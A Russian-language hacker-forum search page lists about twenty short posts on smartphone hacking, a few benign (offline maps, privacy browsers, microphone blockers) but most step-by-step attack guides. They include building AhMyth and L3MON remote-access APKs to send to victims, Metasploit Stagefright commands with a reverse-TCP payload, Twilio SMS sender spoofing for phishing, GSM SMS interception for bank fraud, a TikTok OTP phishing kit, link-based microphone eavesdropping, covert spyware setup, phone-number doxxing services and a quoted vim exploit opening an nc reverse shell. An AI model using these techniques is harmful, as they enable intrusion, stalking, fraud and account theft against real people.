Jump to content
Новости и объявления.
  • Уважаемые гости. При посещении нашего сайта, просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.д. Рекомендуем посетить разделы: "Общение, Коммерческий раздел, Услуги Хакеров и статьи, Отзывы о сайте и пользователях, Черный список" и другие разделы нашего сайта. ***ВНИМАНИЕ*** При обращении за помощью, просим быть внимательными, на сайте есть, как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант сервиса. XAKERSAY.COM
  • Взлом
  • Взлом
  • Гарант-сервис
  • Реклама на форуме

Search the Community

Showing results for tags 'взлом смартфона'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • XAKERSAY
    • Hacker Forum news.
    • Transactions are the guarantor of the service.
    • A section for resolving controversial issues.
  • Общение.
    • A section for resolving controversial issues.
    • A section for resolving controversial issues.
  • Коммерческий раздел.
    • A trading platform on a hacker site.
    • Services related to communication, telephony, number substitution, etc.
    • Promotion, promotion, SEO, etc.
    • Sale-Purchase Of Cryptocurrencies.
  • Практика взлома, информация и т.д
    • Web vulnerability.
    • Social network
    • E-Mail (Mail).
    • Malware.
    • Soft Hacker
    • Freebie (I'll give it away for free).
    • Help with various software problems and computer problems.
  • Безопасность.
    • Help with malware infection.
    • Punishment for hacking.
    • Secure connection with IP address substitution and security articles.
  • XAKER (Hacker Services and articles).
    • Services of professional hackers (HACKING SERVICES)
    • Hacking services (REFUSED VERIFICATION).
    • About professional hackers (ARTICLES AND STORIES).
    • Requests for help.
  • Other topics, miscellaneous.
    • Reviews of hackers/programmers who helped you.
    • Reviews about our site and suggestions to change your opinion.
    • Reviews of third-party resources.
  • Реклама на форуме.
    • Advertising on the forum.
  • Черный список. (BLACK LIST).
    • BLACKLIST. Scammers and would-be hackers.
    • What methods scammers use to deceive users (Articles).
  • Разное.
    • Other topics, miscellaneous.
    • Other topics, miscellaneous.

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Сайт


ICQ


Yahoo


Skype


Город


Интересы

Found 23 results

  1. Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как вы можете без интернета посмотреть карту местности. Приложение-навигатор должно обладать особыми характеристиками, чтобы помочь сэкономить бесценный трафик и оградить тебя от судорожного поиска Wi-Fi спота в тот момент, когда ты уже потерялся. Maps.me - быстрые, подробные и полностью автономные карты с пошаговой навигацией. Доступны для iOS и Android. Скачивайте путеводитель и карты разных городов мира и пользуйтесь ими офлайн. Карте не требуется подключение к интернету, чтобы определить ваше местонахождение, автоматически определяет GPS координаты для построения наиболее оптимального маршрута. Офлайн-навигация доступна для пяти видов транспорта. Будьте осторожны, продолжительное использование GPS в фоновом режиме может значительно сократить время работы батареи. Очень удобное приложение, если вам срочно необходимо узнать свое местоположение, а интернет у вас отсутствует. Поэтому попробуйте, возможно оно вам пригодится. Сервис Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  2. Приветствую, хакеры! Многим известно, что запускать неизвестного происхождения файлы небезопасно, но сколько человек при этом открывает незнакомые текстовые файлы, например, в текстовом редакторе? Особенно если это Linux и какой-нибудь проверенным временем текстовый редактор vim/emacs! Что может случиться? Краткое описание недавней уязвимости в vim Не хочу вдаваться в технические подробности дырки, которую нашли в текстовом редакторе vim, об этом написано немало статей (уязвимости присвоен номер CVE-2019-12735), но хочу рассказать о том, какую опасность это несёт и почему надо быть предельно аккуратным даже с такими, казалось бы, базовыми инструментами. Вектор атаки: вам присылают файлик, вы его открываете в vim, а тем временем у вас на компьютере выполняется код. Например, качается с удаленного сервера бекдор и устанавливается в систему. Причем вы даже не видите целиком содержимого файла, вся выполняемая конструкция замаскирована и не отображается. Демонстрация экслоита Рассмотрим один из экслоитов для vim. $ wget https://raw.githubusercontent.com/numirias/security/master/data/2019-06-04_ace-vim-neovim/shell.txt А теперь попробуем его прочитать, например, утилитой cat: $ cat shell.txt Nothing here. А вот что в файлике находится на самом деле: $ cat -v shell.txt [?7l SNothing here. :silent! w | call system('nohup nc 127.0.0.1 9999 -e /bin/sh &') | redraw! | file | silent! # " vim: set fen fdm=expr fde=assert_fails('set\ fde=x\ \|\ source\!\ \%') fdl=0: [1G [KNothing here." [D То есть вы качаете незнакомый файлик, открываете его в уязвимом текстовом редакторе и у вас открывается шелл на 9999-порту и делай дальше с вашей машиной что хочешь. Вывод Открытие незнакомых текстовых файлов даже в текстовых редакторах может быть опасным. Если вы не доверяете источнику, с которого скачен файл, лучше запустить его в изолированном окружении вроде виртуальной машины, или тестовой vps. Как вариант — добавьте в ваш шелл (например, ~/.zshrc) следующий alias, чтобы хоть как-то обнаружить возможную маскировку шелл-кода в незнакомом файле. При условии что это не эксплоит к утилите cat, или терминалу. alias cv='cat -v' Ну и конечно же не забывайте обновлять всё ПО и ОС на всех ваших девайсах. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  3. Приветствую, хакеры! В данной статье собраны несколько секретных Android-папок, которые могут вам пригодиться. Контакты пользователя: /data/data/com.android.providers.contacts/databases/contacts2.db Данные смс сообщений: /data/data/com.android.providers.telephony/databases/mmssms.db История звонков: /data/data/com.android.providers.contacts/contacts.db Журнал событий Android: /data/com.sec.android.provider.logsprovider/databases/logs.db История веб браузера: /data/data/com.android.browser/databases/browser2.db Истории браузера Chrome: /data/data/com.android.chrome/app_chrome/Default/Archived History /data/data/com.android.chrome/app_chrome/Default/History Логины и пароли водимые в браузере Chrome: /data/data/com.android.chrome/app_chrome/Default/Login Data Браузер Firefox. /data/data/org.mozilla.firefox/files/mozilla Сообщения Facebook: /data/data/com.facebook.katana/databases/threads_db2 /data/data/com.facebook.orca/databases/threads_db2 Контакты WhatsApp: /data/data/com.whatsapp/databases/wa.db Звонки WhatsApp: /data/data/com.whatsapp/databases/msgstore.db Сообщения WhatsApp: /data/data/com.whatsapp/databases/msgstore.db Сообщения и звонки для Skype: /data/data/com.skype.raider/files//main.db Viber хранит отдельно сообщения и звонки: /data/data/com.viber.voip/databases/viber_data Сообщения Viber: /data/data/com.viber.voip/databases/viber_messages Telegram: /data/data/org.telegram.messenger/files/cache4.db Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  4. Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как спрятать любое приложение на вашем смартфоне. Вероятно, каждый сталкивался с ситуацией, когда необходимо было передать кому-то разблокированное устройство, переживая за то, чтобы он может обнаружить нежелательные приложения или получить доступ к секретной информации. Благодаря App Hider, вы сможете избежать неприятных ситуаций и скрыть приложения из основного меню в защищенном хранилище, внешний вид которого можно изменять под различные неприметные калькуляторы. Помимо прочего, есть возможность скрыть отдельные фотографии и видеозаписи из вашей галереи. Программа являет собой изолированное от системы пространство, в котором находятся копии добавленных приложений, поэтому после скрытия, в основном меню необходимо будет удалить оригинальные версии приложений. Поэтому если вам необходимо убрать с глаз какое-то приложение, то это один из самых простых и эффективных вариантов, которыми вы можете без проблем воспользоваться. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  5. Приветствую, хакеры! В данной небольшой статье я хочу рассказать о том, как взломать и управлять смартфоном удаленно. AhMyth RAT - это приложение с открытым исходным кодом, доступное только в бета-версии. Инструмент нацелен на пользователей Windows, но шрифты AhMyth также можно загрузить с GitHub для UNIX-подобных платформ, отмечают эксперты по мобильному взлому. Установка: Устанавливаем Java Скачиваем AhMyth RAT Создаём вредоносный APK: Чтобы создать файл APK для Android, откройте вкладку APK Builder. В поле IP-адреса источника необходимо ввести IP-адрес атакующей машины. В поле Source port вы можете указать порт, который машина зарезервирует для прослушивания соединений (порт по умолчанию - 42,474). Затем нажмите кнопку «Создать»; по умолчанию зараженный файл сохраняется в следующей папке: C:UsersAhMythOutput Готово! Теперь осталось отправить жертве данный APK файл. Вот таким простым способом вы можете взломать и получить полный доступ над каким-либо смартфоном, поэтому пользуйтесь пока данный метод работает. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  6. Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как можно удалить все данные с Android, если вы потеряли телефон. Данные в смартфоне — важнее самого устройства. Все банковские карты, важные документы и доступ к соцсетям хранятся в телефоне. Если вдруг вы потеряете девайс или его у вас украдут — кто-то получит всю эту информацию. Обезопасьте себя заранее, чтобы потом не жалеть. Find My Device - приложение заблокирует смартфон, узнает его местоположение и удалит все данные, если с ним что-то случится. Помимо этого, можно установить новый пароль, включить громкий звук и отправить сообщение на телефон. Входим через Google, даём права администратора и все фичи доступны на удобной панели. Если вы потеряли телефон — установите приложение на другое устройство и войдите в него. Find My Device поможет найти не только смартфон, но и планшет с часами. И помните: если на потерянном гаджете нет интернета и заряда, то уже никакое приложение не поможет. Поэтому если вы беспокоитесь за сохранность своих данных, то позаботьтесь о них сейчас и установите данное приложение. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  7. Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как можно взломать и получить удаленный доступ к телефону. AhMyth RAT - это приложение с открытым исходным кодом, доступное только в бета-версии. Инструмент нацелен на пользователей Windows, но шрифты AhMyth также можно загрузить с GitHub для UNIX-подобных платформ, отмечают эксперты по мобильному взлому. Установка: Устанавливаем Java Скачиваем AhMyth RAT Создаём вредоносный APK: Чтобы создать файл APK для Android, откройте вкладку APK Builder. В поле IP-адреса источника необходимо ввести IP-адрес атакующей машины. В поле Source port вы можете указать порт, который машина зарезервирует для прослушивания соединений (порт по умолчанию - 42,474). Затем нажмите кнопку «Создать»; по умолчанию зараженный файл сохраняется в следующей папке: C:\Users\ваш_юзер>\AhMyth\Output Готово! Теперь осталось отправить жертве данный APK файл. Это отличный и эффективный способ для взлома любого телефона на базе Android. Кроме того, с помощью него очень удобно управлять устройством удаленно. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  8. Приветствую, хакеры! В данной небольшой статье хочу предоставить вам небольшую подборку безопасных браузеров для смартфонов Android и iOS. Android: 1. Bromite — это браузер на базе Chromium с улучшенной настройкой конфиденциальности и безопасности. Встроенный блокировщик рекламы, поддержка DNS-over-HTTPS, Canvas и другие фичи. 2. Fennec F-Droid — форк браузера Mozilla Firefox для Android, заточенный на приватность. 3. Privacy Browser — еще одна альтернатива с открытым исходным кодом. GPLv3+ лицензия. iOS: 1. Onion Browser — браузер с открытым исходным кодом, позволяющий заходить в сеть Tor c устройств на iOS. 2. SnowHaze — неплохой браузер с открытым исходным кодом и встроенными анти-трекерами, блокировкой отпечатка браузера и не только. Для обеих ОС: DuckDuckGo Privacy Browser, полагаю, что в представлении не нуждается. (Android | iOS) Это отличные варианты, чтобы улучшить свою безопасность при использовании смартфонов. Обыкновенные браузеры не способны давать такой уровень защиты, как эти решения, поэтому рекомендую пользоваться именно ими. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  9. Приветствую, хакеры! В данной небольшой статье мы поговорим о том, как при помощи всего-лишь одной ссылки получить полный контроль над чужим устройством. Поможет нам в этом специальная утилита Metasploit, которая прекрасно справляется с уязвимостями Android старых версий. Приступим: 1. Первым делом устанавливаем нашу утилиту в Termux: update apt upgrade pkg install unstable-repo pkg install Metasploit 2. После этого запускаем утилиту: 3. Теперь, если Stagefright нет в Metasploit, то скачиваем его отсюда →ТЫК← и перекидываем в папку с эксплоитами. 4. После этого прописываем: msfconsole — открытие консоли use exploit/android/browser/stagefrightmp4tx3g64bit — подключение эксплоита set SRVHOST вашIP URIPATH / set PAYLOAD linux/armle/mettle/reversetcp set LHOST вашIP set VERBOSE true exploit -j — запуск эксплоита Для нас сгенерируется специальная ссылка. Заворачиваем её в ngrok, по желанию маскируем и отправляем жертве под любым предлогом. Когда жертва по ней перейдёт, мы получим удалённый доступ к устройству. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  10. Приветствую, хакеры! В данной небольшой статье я расскажу вам о том, как заблокировать доступ к микрофону смартфона. Прямо сейчас и во время звонков другие приложения могут прослушивать вас, ведь когда-то вы дали им доступ к микрофону телефона. Чтобы навсегда избавиться от прослушки, есть полезное приложение — Micro Guard FREE для Android. Оно надёжно блокирует микрофон, чтобы никакие приложения не получили к нему доступ. В отличие от альтернатив, блокировщик защищает даже от шпионского ПО и требует минимального количества разрешений, поэтому это будет лучшим выбором среди подобных приложений. Чтобы воспользоваться этим методом, необходимо: Скачать приложение из Google Play. Открыть, передвинуть ползунок в режим «ON» и нажать на «Поиск шпионских программ». Затем нажать на «Устранить все проблемы». Разрешить включить функцию «Deep detective». Она поможет фиксировать попытки получить доступ к микрофону без вашего ведома. На iOS есть хорошая альтернатива — McAfee Mobile Security. Помимо других фич, там также есть блокировка микрофона. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  11. Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам об интересной подборке сервисов, которые позволяют узнать нам достаточно приличный объём информации о пользователе, имея на руках только номер его сотового телефона. Сервисы: 1. Lampyre (https://lampyre.io/) - веб-версия поиска по аккаунтам и телефонной книге. 2. Getcontact (https://www.getcontact.com/ru/) - поиск информации о том, как записан номер в контактах. 3. Avinfo Guru (https://avtobot.net/avinfo-guru-prilozhenie) - пробиваем владельца авто по телефону. 4. Telefon Stop-list (http://telefon.stop-list.info/) - поиск номера по всем ресурсам. 5. Rosfirm (https://www.rosfirm.ru/) - поиск ФИО, прописки, адреса. Но нужно знать город. 6. Spravnik (https://spravnik.com/) - поиск по городскому номеру, находит ФИО и адрес. Все эти сервисы могу быть для вас очень полезными. Ведь эти сервисы – самый быстрый способ пробива практически любого номере телефона. Поэтому, пользуйтесь, пока возможно, никаких особенных навыков для этого не нужно. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  12. Приветствую, хакеры! В данной небольшой статье я хочу с вами поделиться облачным пакетом удалённого управления Android под названием L3MON. L3MON - это облачный пакет для удалённого управления Android. Установка: $ apt install nodejs npm $ npm install pm2 -g $ git clone https://github.com/D3VL/L3MON.git Использование: $ cd L3MON $ cd server $ npm install $ npm audit fix $ pm2 start index.js $ pm2 startup Теперь вам нужно изменить пароль на шифрование хэша MD5 и поместить его в файл конфигурации для защиты панели администратора. Вы можете изменить пароль в соответствии с приведенной ниже командой. $ echo -n "12345" | md5sum $ nano maindb.json Запустите localhost на браузере и введите имя пользователя «admin» и пароль «12345». Создайте APK вирус и отправьте её жертве. После того жертва запустить ваш вирус, у вас на localhost появится его устройство со всеми функциями доступа. Отличный метод взлома смартфона на Android. У этого способа есть огромный потенциал, а самое главное, что вам не потребуется огромного количества навыков, чтобы начать изучать подобный взлом. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  13. Друзья, всех приветствую! В этой статье я хочу рассказать о подмене номера отправителя СМС и о подмене номера звонящего, более известных в интернете, как senderid spoofing и callerid spoofing. SenderID Spoofing мы можем видеть очень часто: когда при создании аккаунта мы вводим номер телефона, то нам приходит смска, часто от имени компании где мы заводим аккаунт. CallerID Spoofing встречается реже, но клиенты сбербанка могут помнить, что с номера 900 им может позвонить бот. Подмена сообщений Разберем метод подделки отправителя, мы сможем отправлять SMS от имени компаний в несколько кликов. Twilio Очень эффективный метод для крупной фишинговой атаки. Первым делом регистрируемся с помощью новой почты и левого номера телефона(можно публичного виртуального) и заходим в аккаунт.Присылать СМС с названием компании вместо номера можно в большинстве стран, но не во всех.В России нужно попросить у тех поддержки зарегестрировать senderid(это небольшая проблема) с помощью формы, это займет от дня до недели.Если регистрация для страны не требуется, пропускаем предыдущий пункт.Берём простенький код на Python:from twilio.rest import Client account_sid = 'СИД АККАУНТА' auth_token = 'ТОКЕН' client = Client(account_sid, auth_token) message = client.messages.create(body='Привет!', from_='ОТПРАВИТЕЛЬ', to='ПОЛУЧАТЕЛЬ') print(message.sid) Токен и SID смотрим в консоли twilio из Project INFO(Console | Twilio)Теперь нам нужно апгрейднуть аккаунт, в правом верхнем углу будет баланс, а рядом "Upgrade", жмём и вводим левые данные.Как только нас просят оплатить, переключаемся на промокод и вводим TWILIOQUEST, получаем бесплатно платный аккаунт.Теперь можем запускать код, который я привел в статье ранее.Получаем сообщение от QIWI: Вместо безобидного приветствия там могла быть фишинговая ссылка. При проделанных действиях будет так-же отображаться история сообщений от настоящего QIWI Такая атака практически не используется хакерами, а зря. Ведь даже просвященный юзер, с довольно-таки большой вероятностью, может попасться на это. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  14. Приветствую, хакеры! Технология Signalling System No.7 (SS7), которой уже около 40 лет, имеет критическую уязвимость. Благодаря этому мы можем получать доступ к аккаунтам соцсетей, онлайн-банкингу и прослушивать мобильные звонки, имея в распоряжении только номер телефона жертвы. Нам понадобится: Совместимый телефон на базе чипсета Calypso или MediaTekПрошивка OsmocomBBКабель и преобразователь USB-TTLКомпьютер под управлением Unix-like ОСИтак, мы имеем настроенную ОС со стеком OsmocomBB Запускаем стек программ osmocombb. Тут все просто. Предварительно подключаем наш кабель к компьютеру и пробрасываем его внутрь виртуалки. В виртуальной машине должно появиться устройство /dev/ttyUSB0. Далее подключаем ВЫКЛЮЧЕННЫЙ телефон к кабелю через аудиоджек. Открываем две консоли. В первой запускаем команду: #~/osmocom-bb-master/src/host/osmocon/osmocon -p /dev/ttyUSB0 -m c123xor -c ~/osmocom-bb-master/src/target/firmware/board/compal_e88/layer1.highram.bin И нажимаем красную кнопку включения телефона. Этой командой мы запускаем загрузку прошивки в телефон, а также открытие сокета, через который будет идти общение наших программ с телефоном. Это так называемый layer 1 модели OSI. Реализует физическое взаимодействие с сетью. Во второй консоли запускаем команду: #~/osmocom-bb-sylvain/src/host/layer23/src/misc/ccch_scan -a 774 -i 127.0.0.1 Эта команда реализует layer 2-3 модели OSI. А именно прослушивание эфира в поисках пакетов общего управления СССH (Common Control Channel). -a 774 — обозначает ARFCN, на котором мы вещаем. -i 127.0.0.1 — интерфейс, на который мы отправим наши пакеты. И запускаем Wireshark. Он все сделает за нас, а именно соберет необходимые пакеты в SMS, распарсит TPDU/PDU-формат и покажет нам все в удобочитаемом виде. Давайте перехватим, например, SMS для того что бы подтвердить вывод средств из чужого счет Сбербанка онлайн. Для удобства просмотра в Wireshark ставим фильтр на gsm_sms-пакеты, чтобы не засорять экран. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  15. Приветствую, хакеры! Чтобы увеличить привлекательность смартфонов, производители ставят на них как можно больше разных программ. Это понятно. Просто берём и удаляем ненужное… Стоп. Оказывается, некоторые программы невозможно удалить. Например, на отдельных моделях Samsung невозможно удалить Facebook (есть только опция 'disable'). Говорят, на Samsung S9 вдобавок предустановлены «неудаляемые» приложения Microsoft. Очень редко встречаются примеры моделей, на которых нет лишних программ. Например, когда вышел первый iPhone, то компания Apple жёстко зафиксировала пакет установленных приложений, поэтому оператор AT&T не смог добавить туда свой привычный мусор. В принципе, по такой логике и многочисленные приложения от Apple на iPhone можно считать ненужным мусором. Если быть точным, на iPhone предустановлены 42 приложения, не все из которых легко удалить. На Android же предустановлено 29 приложений, и тоже некоторые из них не удаляются стандартными средствами
  16. Приветствую, хакеры! На сегодняшний день есть достоверный способ отличить ваш сотовый от любого другого – это уникальный идентификационный номер или IMEI. Благодаря ему можно проверить смартфон на подлинность и даже определить местонахождение включенного гаджета (такие полномочия имеют сотрудники полиции). Российские мошенники построили целый бизнес на IMEI чужих смартфонов. Излюбленные жертвы – люди с сайтов объявлений, которые решили продать свой гаджет. Завязывается разговор о продаже, в котором преступники используют стандартный набор фраз, которые используются в общении с покупателями. Какой телефон, сколько ему лет, есть ли у него проблемы с экраном или нет. Бдительность усыпляют стандартные вопросы. В этот момент мошенник начинает делать вид,что готов купить смартфон. А затем между делом интересуется IMEI продаваемого устройства. Интерес к данному вопросу объясняется просто – необходимо проверить, является ли данный гаджет оригинальным, и не находится ли он в базе краденых. Ведь ни для кого не секрет что в продаже есть много поддельных телефонов и телефонов, которые были украдены, поэтому данный вопрос не будет вызывать подозрений. Продавец называет мошеннику IMEI мобильного телефона. После чего преступник скрывается с радаров. Затем появляется снова, чтобы заявить, что самолично внес идентификационный номер в базу краденных устройств. А если вы хотите, чтобы он оттуда исчез, то вам придется раскошелиться. В этом случае продажа смартфона будет значительно затруднена, ведь любой потенциальный покупатель сможет свериться с открытыми базами в интернете. Здесь стоит сделать ремарку, что злоумышленник не «берет на понты», он действительно внес IMEi устройства в базу краденых. Это легко проверить, а ссылки в качестве доказательства преступники высылают сами. Базы краденых телефонов находятся в открытом доступе, и каждый владелец может внести туда IMEI устройства, которое у него увели. Однако данные в базах никто не модерирует от слова совсем, так что IMEI телефона на подобных сайтах действительно может доставить неприятностей.
  17. Приветствую, хакеры! Расскажу вам про довольно старый, но всё ещё актуальный трюк с телефоном. Скажу, что пол минуты на то, чтобы вытащить данные, нам не хватит, так как информации много. Итак, для начала разберём все возможные пути к базам с информацией. Воспользуемся утилитой Sqlitebrowser. Софт доступен на несколько OC. Телефонная книга /data/data/com.android.providers.contacts/databases/contacts2.db SMS,MMS сообщения /data/data/com.android.providers.telephony/databases/mmssms.db Календарь /data/com.android.providers.calendar/databases/calendar.db Журнал событий /data/com.sec.android.provider.logsprovider/databases/logs.db Данные владельца устройства /data/system/users/0/accounts.db История веб-браузера /data/data/com.android.browser/databases/browser2.db История веб-браузера Chrome /data/data/com.android.chrome/app_chrome/Default/History /data/data/com.android.chrome/app_chrome/Default/Archived History Логины и пароли веб-браузера Chrome /data/data/com.android.chrome/app_chrome/Default/Login Data История веб-браузера Firefox /data/data/org.mozilla.firefox/files/mozilla Сообщения Facebook /data/data/com.facebook.katana/databases/threads_db2 /data/data/com.facebook.orca/databases/threads_db2 Оповещения Facebook /data/data/com.facebook.katana/databases/notifications_db Данные о подключении wifi /data/misc/wifi/wpa_supplicant.conf Сообщения/звонки Skype /data/data/com.skype.raider/files//main.db Данные о сим картах /data/data/com.android.providers.telephony/databases/telephony.db Браузеры В базах данных с браузеров есть: закладки, история, поисковые запросы. Добавляем бд в софт и видим таблицы с результатами, по разным фильтрам Контакты и Звонки Получаем информацию о звонках и списки контактов. Загружаем базу с контактами и выбираем таблицу contacts, получаем список Далее грузим историю звонков(журнал звонков) Данные о WIFI Получаем имя SSID, PSK в текстовом виде, тип подключения/шифрования, приоритет. Информация предоставляется в текстовом формате для читабельности. Календарь В календаре мы можем увидеть какие либо праздники, напоминания нашей "жертвы". Загружаем базу С остальными базами, поступаем также, достав информацию с телефона, главное её правильно обработать, вы обязательно найдёте,что то полезное. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  18. Приветствую, хакеры! На данный момент есть две полноценные работающие программы-шпионы. Это WardenCam и TrackView. Принцип работы обеих программ аналогичный. Первая имеет некоторое преимущество, а именно: есть возможность подключения учетной записи в Dropbox, где можно хранить видео с телефона. Но такая программа не работает с некоторыми мобильными устройствами, например Nexus 7.А вот программа TrackView намного интереснее, она универсальна и подходит ко всем устройствам. Она не только может организовать видеонаблюдение с телефона, но и это полноценный шпион для полного контроля над устройством. Она дает возможность отследить месторасположение устройства, получить данные с камеры, даже управлять микрофоном. С одной стороны такими вещами заниматься запрещено, но с другой стороны – это способ контроля над телефоном. Например, если телефон оставить в машине, и ее угонят, то отследить перемещение автомобиля по GPS не составит проблем. Или с ее помощью следить за ребенком. А можно даже оставить в квартире в неприметном месте и следить за ней. Есть в ней еще одна полезная утилита: можно вести переговоры с другими устройствами подключенными к аккаунту .Как следить за человеком через телефон? Для начала нужно скачать с Play Market саму программу. TrackView нужно установить именно на приложение Android, за которым и нужно вести контроль. Это может быть любое устройство, которое имеет встроенную веб камеру. Можно скачать такую программу для продуктов Apple или даже для Windows. Такие дистрибутивы есть на сайте разработчика программы. Кроме того, для контроля нужно иметь одинаковые аккаунты для разных устройств, которые зарегистрированы на Гугл. Это может быть почта, Youtube, прочие сервисы. А самое главное, чтобы в каждом устройстве был активен и настроен интернет, Wi-Fi. Причем он должен быть включен постоянно. Как настроить программу шпион TrackView ? 1. После закачки и запуска TrackView нужно зайти на каждом устройстве в аккаунт и добавить устройство. 2. На каждом устройстве появится несколько функций: просмотр видео, управление микрофоном и управление месторасположением. 3. Во вкладке камера можно управлять не только изображением с веб камеры, но и архивировать данные, записывать видео или активировать микрофон для передачи голосовых сообщений. 4. Геолокация непосредственно подключена к картам Гугл. Устройство отображается или с помощью интернета, или через GPS. 5. С помощью звукового сигнала можно послать вызов на другое устройство. Кроме того, программа TrackView позволяет: просмотреть или запустить записанные файлы, настроить фильтры сообщений, запустить и настроить детекторы движения, прочие особенности. На самом деле, программа очень простая и удобная, интерфейс лёгкий рассчитан для чайника, поэтому проблем с установкой и активацией продукта не возникнет. Только нужно учитывать, что устройство постоянно должно быть активно, только так выйдет за ним следить. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации
  19. Способы взлома вашего аккаунта Tiktok Есть несколько способов взломать учетные записи Tiktok, но взлом учетных записей Tiktok совсем не прост, большинство из нас думают, что мы можем взломать учетную запись tiktok с помощью kali linux, но мы также взламываем ее с помощью Android Когда дело доходит до взлома учетных записей Tiktok, люди говорят, что вы должны иметь свой смартфон жертвы в руке, чтобы взломать его Да, это тоже возможно, вы даже можете взломать, не прикасаясь к устройству жертвы Есть в основном два способа сделать это, один-когда у вас есть телефон жертвы, а другой-когда у вас его нет Как взломать аккаунты tik tok Давайте посмотрим, как мы сможем взломать Tiktok в 2020 году, В наших предыдущих постах я рассказал вам, как взломать Facebook с помощью Termux, а также рассказал вам об установке продвинутых фишинговых инструментов в Termux, если вы пропустили, то можете прочитать, перейдя по ссылкам ниже Шаги по взлому аккаунтов Tiktok В этом уроке мы используем Termux Итак, сначала установите приложение Termux из Playstore Затем откройте Termux и выполните следующие действия, чтобы установить Advanced Phishing Tool в Termux После установки Termux введите эту команду termux-настройка-хранение Затем набрать pkg install git Затем git клон https://github.com/Ignitetch/AdvPhishing.git Затем cd AdvPhishing & & ls Затем chmod +x start.sh И chmod +x An-AdvPhishing.sh Теперь наберите ./start.sh Теперь вам нужно ввести y для yes, тогда он попросит Ngrok Token, goto http://ngrok.io затем зарегистрируйтесь там, скопируйте и вставьте код токена в Termux Теперь ты готова, просто набери ./An-AdvPhishing.sh Затем введите Y , затем вы должны включить мобильную точку доступа, Вы получите такой интерфейс, теперь вам нужно набрать 1 и нажать enter для Tiktok Теперь вы получите ссылку, как показано на скриншоте Отправьте ссылку жертве, и в то же время вы должны Гото https://tikok.com/login Если вы жертва вводите логин номер, Используйте этот номер для входа в систему, и OTP будет отправлен вашей жертве Если ваша жертва вводит учетные данные OTP на поддельном сайте, то вы получите этот OTP на Termux, можете использовать их для входа в свою учетную запись Это все, что вы можете получить доступ к их учетной записи, надеюсь, вы узнали, как взламывают аккаунт tiktok Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информаци
  20. Сегодня поговорим о том, как имея в распоряжении один лишь компьютер с операционной системой Linux или смартфон с Termux’ом на борту, можно сделать полноценное прослушивающее устройство введя в консоли пару-тройку нехитрых команд. Внимание! Замечу, что эта статья написана только для образовательных целей. Мы никого ни к чему не призываем, только в целях ознакомления! Автор не несёт ответственности за ваши действия! Погнали! Инструкция Копируем с гитхаба скрипт sayhello: git clone https://github.com/Aaryan101/sayhello Переходим в соответствующий каталог: cd sayhello Выдаем разрешения: chmod +x sayhello.sh И запускаем скрипт для прослушки: bash sayhello.sh В появившемся окне указываем сервис для форварда (Ngrok 2), а затем выбираем куда будет вести редирект. По дефолту он отправляет жертву прямиком на ютубчик. Копируем сгенерированную ссылку. Далее включаем соображалку, думая под каким благовидным предлогом можно передать её жертве. В конце статьи я подкину вам идею. Если клиент на том конце разрешит доступ То в окне скрипта сразу забегают строки, оповещающие о сохранении файлов аудиозаписей. Прослушать их можно перейдя в каталог sayhello. Записи будут сохраняться до тех пор, пока вы не завершите работу скрипта нажав CTRL+C, либо не ребутните тачку. Жёсткий диск при этом забивается со скоростью света. Основная сложность этого метода заключается в том, как заставить жертву перейти по ссылке, да ещё и разрешить доступ к своему микрофону. Обычно хакеры используют для этого различные площадки с обучающими вебинарами. Т.е. падает вам на почту письмо, мол так и так мы такая-то академия или учебный центр, пройдите по ссылке для доступа к вебинару или онлайн-конференции. Естественно, при таком раскладе в голове обывателя не возникает сомнений в момент подтверждения доступа. Ведь в вебинаре нужно же как-то участвовать. Причём само мероприятие может быть вполне реальным. Вас редиректнут, вы зарегаетесь на фейковом сайте и всё вроде бы ОК. Однако в этот момент вы уже плотно попались на удочку и все ваши разговоры передаются прямиком хакеру. Поэтому будьте предельно бдительны, прежде чем переходить по каким-либо ссылкам. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
